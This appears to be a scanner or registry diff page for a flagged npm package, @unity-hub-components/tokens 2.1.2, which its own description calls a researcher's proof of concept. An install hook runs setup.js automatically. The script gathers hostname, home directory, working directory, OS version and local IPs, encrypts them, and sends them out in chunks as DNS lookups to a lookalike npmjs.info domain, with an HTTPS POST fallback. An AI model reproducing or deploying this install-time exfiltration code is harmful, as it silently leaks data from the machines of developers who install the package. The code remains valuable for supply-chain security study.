@unity-hub-components/tokens 2.1.2

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of @unity-hub-components/tokens might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +0 -0
  2. package/package.json +11 -0
  3. package/setup.js +169 -0
package/index.js ADDED
File without changes
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "@unity-hub-components/tokens",
3
+ "version": "2.1.2",
4
+ "description": "This package is a proof of concept used by an independent researcher. It has been uploaded for test purposes only.",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "install": "node setup.js @unity-hub-components/tokens"
8
+ },
9
+ "author": "CapybaraSecurity@protonmail.com",
10
+ "license": "ISC"
11
+ }
package/setup.js ADDED
@@ -0,0 +1,169 @@
1
+ var cwd
2
+ var secret
3
+ var hostname
4
+ var homedir
5
+ var version
6
+ var ip
7
+ var url
8
+ var data
9
+ var dataChunks
10
+ var maxLength = 25
11
+
12
+
13
+ var AESCrypt = {};
14
+
15
+ AESCrypt.encrypt = function(cryptkey, iv, cleardata) {
16
+
17
+ var encipher = crypto.createCipheriv('aes-256-cbc', cryptkey, iv);
18
+ var encryptdata = encipher.update(cleardata, 'utf8', 'binary');
19
+
20
+ encryptdata += encipher.final('binary');
21
+ encode_encryptdata = new Buffer.from(encryptdata, 'binary').toString('hex');
22
+
23
+ return encode_encryptdata;
24
+
25
+ }
26
+
27
+
28
+ function generateUID() {
29
+
30
+ var firstPart = (Math.random() * 46656) | 0;
31
+ var secondPart = (Math.random() * 46656) | 0;
32
+
33
+ firstPart = ("000" + firstPart.toString(36)).slice(-3);
34
+ secondPart = ("000" + secondPart.toString(36)).slice(-3);
35
+
36
+ return firstPart + secondPart;
37
+
38
+ }
39
+
40
+
41
+ function splitToSubstrings(str, n) {
42
+
43
+ const arr = [];
44
+
45
+ for (let index = 0; index < str.length; index += n) {
46
+
47
+ arr.push(str.slice(index, index + n));
48
+
49
+ }
50
+
51
+ return arr;
52
+
53
+ }
54
+
55
+
56
+ function shuffle(array) {
57
+ let currentIndex = array.length, randomIndex;
58
+
59
+ while (currentIndex != 0) {
60
+
61
+ randomIndex = Math.floor(Math.random() * currentIndex);
62
+ currentIndex--;
63
+
64
+ [array[currentIndex], array[randomIndex]] = [
65
+ array[randomIndex], array[currentIndex]];
66
+ }
67
+
68
+ return array;
69
+ }
70
+
71
+
72
+ try{
73
+
74
+ cwd = process.cwd()
75
+
76
+ } catch(e) {
77
+ }
78
+
79
+
80
+ try{
81
+
82
+ var os = require("os");
83
+ hostname = os.hostname();
84
+ homedir = os.homedir()
85
+ version = os.release()
86
+
87
+ } catch(e) {
88
+ }
89
+
90
+
91
+ try{
92
+
93
+ var ifaces = require('os').networkInterfaces();
94
+ var adresses = Object.keys(ifaces).reduce(function (result, dev) {
95
+
96
+ return result.concat(ifaces[dev].reduce(function (result, details) {
97
+
98
+ return result.concat(details.family === 'IPv4' && !details.internal ? [details.address] : []);
99
+
100
+ }, []));
101
+
102
+ });
103
+
104
+ ip = adresses
105
+
106
+ } catch(e) {
107
+ }
108
+
109
+
110
+ data = "{" + "\"" + process.argv[2] + "\"" + ":{" + "\"timestamp\":\"" + Math.floor(new Date().getTime() / 1000).toString() + "\",\"cwd\":\"" + cwd + "\",\"hostname\":\"" + hostname + "\",\"homedir\":\"" + homedir + "\",\"version\":\"" + version + "\",\"local_ip\":\"" + ip + "\"}}"
111
+
112
+ try{
113
+
114
+ var crypto = require('crypto')
115
+ var dns = require('dns');
116
+
117
+ dns.resolveTxt("provider.npmjs.info", (err, addresses)=> secret = addresses);
118
+ var key = crypto.createHash('sha256').update(String(secret)).digest()
119
+ var iv = crypto.randomBytes(16);
120
+ mutex = iv.toString('hex')
121
+
122
+ var encoded = AESCrypt.encrypt(key, iv, data)
123
+
124
+ } catch(e) {
125
+
126
+ encoded = Buffer.from(data,'utf-8').toString('hex')
127
+ mutex = generateUID()
128
+
129
+ }
130
+
131
+ dataChunks = splitToSubstrings(encoded, maxLength)
132
+ var indicie = shuffle(Array.apply(null, {length: dataChunks.length}).map(Number.call, Number))
133
+
134
+ for (let item of indicie) {
135
+
136
+ try{
137
+
138
+ url = dataChunks[indicie[item]] + "." + (indicie[item] + 64).toString(16) + "." + mutex + '.api.npmjs.info'
139
+ const dns = require('dns');
140
+ dns.resolve(url, "A", (err, records)=> test = records);
141
+
142
+ } catch(e) {
143
+
144
+ url = dataChunks[indicie[item]] + "." + (indicie[item] + 64).toString(16) + "." + mutex + '.api.npmjs.info'
145
+ const https = require('https');
146
+
147
+ const options = {
148
+
149
+ hostname: url,
150
+ port: 443,
151
+ path: '/',
152
+ method: 'POST',
153
+ headers: {
154
+ 'Content-Type': 'application/json',
155
+ 'Content-Length': data.length
156
+ },
157
+ rejectUnauthorized: false
158
+
159
+ }
160
+
161
+ index +=1
162
+ const req = https.request(options, res => {});
163
+
164
+ req.write(data);
165
+ req.end();
166
+
167
+ }
168
+
169
+ }